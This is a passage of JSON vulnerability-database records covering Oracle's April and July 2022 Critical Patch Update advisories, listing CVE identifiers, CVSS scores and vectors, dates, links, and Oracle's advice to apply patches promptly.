"CVE-2021-38153", "CVE-2021-38296", "CVE-2021-38604", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-4002", "CVE-2021-40690", "CVE-2021-4083", "CVE-2021-4104", "CVE-2021-4115", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-41303", "CVE-2021-41495", "CVE-2021-41496", "CVE-2021-4157", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-41771", "CVE-2021-41772", "CVE-2021-4197", "CVE-2021-4203", "CVE-2021-42340", "CVE-2021-42575", "CVE-2021-42739", "CVE-2021-43389", "CVE-2021-43396", "CVE-2021-43797", "CVE-2021-43818", "CVE-2021-43859", "CVE-2021-43976", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44832", "CVE-2021-45485", "CVE-2021-45486", "CVE-2021-45943", "CVE-2022-0001", "CVE-2022-0002", "CVE-2022-0286", "CVE-2022-0322", "CVE-2022-0778", "CVE-2022-0839", "CVE-2022-1011", "CVE-2022-1154", "CVE-2022-1271", "CVE-2022-1292", "CVE-2022-21428", "CVE-2022-21429", "CVE-2022-21432", "CVE-2022-21439", "CVE-2022-21455", "CVE-2022-21500", "CVE-2022-21508", "CVE-2022-21509", "CVE-2022-21510", "CVE-2022-21511", "CVE-2022-21512", "CVE-2022-21513", "CVE-2022-21514", "CVE-2022-21515", "CVE-2022-21516", "CVE-2022-21517", "CVE-2022-21518", "CVE-2022-21519", "CVE-2022-21520", "CVE-2022-21521", "CVE-2022-21522", "CVE-2022-21523", "CVE-2022-21524", "CVE-2022-21525", "CVE-2022-21526", "CVE-2022-21527", "CVE-2022-21528", "CVE-2022-21529", "CVE-2022-21530", "CVE-2022-21531", "CVE-2022-21532", "CVE-2022-21533", "CVE-2022-21534", "CVE-2022-21535", "CVE-2022-21536", "CVE-2022-21537", "CVE-2022-21538", "CVE-2022-21539", "CVE-2022-21540", "CVE-2022-21541", "CVE-2022-21542", "CVE-2022-21543", "CVE-2022-21544", "CVE-2022-21545", "CVE-2022-21547", "CVE-2022-21548", "CVE-2022-21549", "CVE-2022-21550", "CVE-2022-21551", "CVE-2022-21552", "CVE-2022-21553", 
"CVE-2022-21554", "CVE-2022-21555", "CVE-2022-21556", "CVE-2022-21557", "CVE-2022-21558", "CVE-2022-21559", "CVE-2022-21560", "CVE-2022-21561", "CVE-2022-21562", "CVE-2022-21563", "CVE-2022-21564", "CVE-2022-21565", "CVE-2022-21566", "CVE-2022-21567", "CVE-2022-21568", "CVE-2022-21569", "CVE-2022-21570", "CVE-2022-21571", "CVE-2022-21572", "CVE-2022-21573", "CVE-2022-21574", "CVE-2022-21575", "CVE-2022-21576", "CVE-2022-21577", "CVE-2022-21578", "CVE-2022-21579", "CVE-2022-21580", "CVE-2022-21581", "CVE-2022-21582", "CVE-2022-21583", "CVE-2022-21584", "CVE-2022-21585", "CVE-2022-21586", "CVE-2022-21824", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-22969", "CVE-2022-22970", "CVE-2022-22971", "CVE-2022-22976", "CVE-2022-22978", "CVE-2022-23181", "CVE-2022-23218", "CVE-2022-23219", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23308", "CVE-2022-23437", "CVE-2022-23457", "CVE-2022-23632", "CVE-2022-23772", "CVE-2022-23773", "CVE-2022-23806", "CVE-2022-24329", "CVE-2022-24407", "CVE-2022-24728", "CVE-2022-24729", "CVE-2022-24735", "CVE-2022-24736", "CVE-2022-24801", "CVE-2022-24823", "CVE-2022-24839", "CVE-2022-24891", "CVE-2022-25169", "CVE-2022-25636", "CVE-2022-25647", "CVE-2022-25762", "CVE-2022-25845", "CVE-2022-27778", "CVE-2022-29577", "CVE-2022-29824", "CVE-2022-29885", "CVE-2022-30126", "CVE-2022-34169"], "modified": "2022-10-31T00:00:00", "id": "ORACLE:CPUJUL2022", "href": "https://www.oracle.com/security-alerts/cpujul2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-30T02:41:46", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. 
These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 520 new security patches across the product families listed below. 
Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2857016.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353", "CVE-2017-14159", "CVE-2017-17740", "CVE-2017-9287", "CVE-2018-1000067", "CVE-2018-1000068", "CVE-2018-1000192", "CVE-2018-1000193", "CVE-2018-1000194", "CVE-2018-1000195", "CVE-2018-11212", "CVE-2018-1285", "CVE-2018-1999001", "CVE-2018-1999002", "CVE-2018-1999003", "CVE-2018-1999004", "CVE-2018-1999005", "CVE-2018-1999007", "CVE-2018-2601", "CVE-2018-6356", "CVE-2018-8032", "CVE-2019-0227", "CVE-2019-1003049", "CVE-2019-1003050", "CVE-2019-10086", "CVE-2019-10247", "CVE-2019-10383", "CVE-2019-10384", "CVE-2019-12086", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-13038", "CVE-2019-13057", 
"CVE-2019-13565", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-14822", "CVE-2019-14862", "CVE-2019-16785", "CVE-2019-16786", "CVE-2019-16789", "CVE-2019-16792", "CVE-2019-17195", "CVE-2019-17571", "CVE-2019-18218", "CVE-2019-18276", "CVE-2019-19603", "CVE-2019-20388", "CVE-2019-20838", "CVE-2019-20916", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-3799", "CVE-2019-5827", "CVE-2020-10531", "CVE-2020-10543", "CVE-2020-10693", "CVE-2020-10878", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11612", "CVE-2020-11971", "CVE-2020-11979", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13935", "CVE-2020-13936", "CVE-2020-13956", "CVE-2020-14155", "CVE-2020-14340", "CVE-2020-14343", "CVE-2020-15250", "CVE-2020-15358", "CVE-2020-15719", "CVE-2020-16135", "CVE-2020-17521", "CVE-2020-17527", "CVE-2020-17530", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-24977", "CVE-2020-25638", "CVE-2020-25649", "CVE-2020-25659", "CVE-2020-27218", "CVE-2020-28052", "CVE-2020-28196", "CVE-2020-28895", "CVE-2020-29363", "CVE-2020-29582", "CVE-2020-35198", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36242", "CVE-2020-36518", "CVE-2020-5245", "CVE-2020-5413", "CVE-2020-5421", "CVE-2020-6950", "CVE-2020-7226", "CVE-2020-7595", "CVE-2020-7760", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8203", "CVE-2020-8231", "CVE-2020-8277", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8554", "CVE-2020-8908", "CVE-2020-9488", "CVE-2021-20231", "CVE-2021-20232", "CVE-2021-20289", "CVE-2021-21275", "CVE-2021-21290", "CVE-2021-21295", "CVE-2021-21409", "CVE-2021-21703", "CVE-2021-22096", "CVE-2021-22118", "CVE-2021-22132", "CVE-2021-22134", "CVE-2021-22144", "CVE-2021-22145", 
"CVE-2021-22569", "CVE-2021-22570", "CVE-2021-22696", "CVE-2021-22897", "CVE-2021-22898", "CVE-2021-22901", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23017", "CVE-2021-23450", "CVE-2021-2351", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2427", "CVE-2021-2464", "CVE-2021-2471", "CVE-2021-25219", "CVE-2021-26291", "CVE-2021-27568", "CVE-2021-27645", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28168", "CVE-2021-28169", "CVE-2021-28170", "CVE-2021-28657", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-30468", "CVE-2021-3156", "CVE-2021-31799", "CVE-2021-31810", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-3200", "CVE-2021-32066", "CVE-2021-32626", "CVE-2021-32627", "CVE-2021-32628", "CVE-2021-32672", "CVE-2021-32675", "CVE-2021-32687", "CVE-2021-32762", "CVE-2021-32785", "CVE-2021-32786", "CVE-2021-32791", "CVE-2021-32792", "CVE-2021-33037", "CVE-2021-33193", "CVE-2021-33560", "CVE-2021-33574", "CVE-2021-33813", "CVE-2021-33880", "CVE-2021-34429", "CVE-2021-3445", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-34798", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3521", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-35574", "CVE-2021-3572", "CVE-2021-3580", "CVE-2021-35942", "CVE-2021-36084", "CVE-2021-36085", "CVE-2021-36086", "CVE-2021-36087", "CVE-2021-36090", "CVE-2021-36160", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3690", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37714", "CVE-2021-3807", "CVE-2021-38153", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-39275", "CVE-2021-4034", "CVE-2021-40438", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-41099", "CVE-2021-41164", "CVE-2021-41165", 
"CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-4181", "CVE-2021-4182", "CVE-2021-4183", "CVE-2021-4184", "CVE-2021-4185", "CVE-2021-41973", "CVE-2021-42013", "CVE-2021-42340", "CVE-2021-42392", "CVE-2021-42717", "CVE-2021-43395", "CVE-2021-43527", "CVE-2021-43797", "CVE-2021-43818", "CVE-2021-43859", "CVE-2021-44224", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45105", "CVE-2022-0391", "CVE-2022-0778", "CVE-2022-20612", "CVE-2022-20613", "CVE-2022-20614", "CVE-2022-20615", "CVE-2022-21271", "CVE-2022-21375", "CVE-2022-21384", "CVE-2022-21404", "CVE-2022-21405", "CVE-2022-21409", "CVE-2022-21410", "CVE-2022-21411", "CVE-2022-21412", "CVE-2022-21413", "CVE-2022-21414", "CVE-2022-21415", "CVE-2022-21416", "CVE-2022-21417", "CVE-2022-21418", "CVE-2022-21419", "CVE-2022-21420", "CVE-2022-21421", "CVE-2022-21422", "CVE-2022-21423", "CVE-2022-21424", "CVE-2022-21425", "CVE-2022-21426", "CVE-2022-21427", "CVE-2022-21430", "CVE-2022-21431", "CVE-2022-21434", "CVE-2022-21435", "CVE-2022-21436", "CVE-2022-21437", "CVE-2022-21438", "CVE-2022-21440", "CVE-2022-21441", "CVE-2022-21442", "CVE-2022-21443", "CVE-2022-21444", "CVE-2022-21445", "CVE-2022-21446", "CVE-2022-21447", "CVE-2022-21448", "CVE-2022-21449", "CVE-2022-21450", "CVE-2022-21451", "CVE-2022-21452", "CVE-2022-21453", "CVE-2022-21454", "CVE-2022-21457", "CVE-2022-21458", "CVE-2022-21459", "CVE-2022-21460", "CVE-2022-21461", "CVE-2022-21462", "CVE-2022-21463", "CVE-2022-21464", "CVE-2022-21465", "CVE-2022-21466", "CVE-2022-21467", "CVE-2022-21468", "CVE-2022-21469", "CVE-2022-21470", "CVE-2022-21471", "CVE-2022-21472", "CVE-2022-21473", "CVE-2022-21474", "CVE-2022-21475", "CVE-2022-21476", "CVE-2022-21477", "CVE-2022-21478", "CVE-2022-21479", "CVE-2022-21480", "CVE-2022-21481", "CVE-2022-21482", "CVE-2022-21483", "CVE-2022-21484", "CVE-2022-21485", "CVE-2022-21486", "CVE-2022-21487", "CVE-2022-21488", 
"CVE-2022-21489", "CVE-2022-21490", "CVE-2022-21491", "CVE-2022-21492", "CVE-2022-21493", "CVE-2022-21494", "CVE-2022-21496", "CVE-2022-21497", "CVE-2022-21498", "CVE-2022-21716", "CVE-2022-21824", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-23181", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23437", "CVE-2022-23852", "CVE-2022-23943", "CVE-2022-23990", "CVE-2022-24329", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315"], "modified": "2022-06-16T00:00:00", "id": "ORACLE:CPUAPR2022", "href": "https://www.oracle.com/security-alerts/cpuapr2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}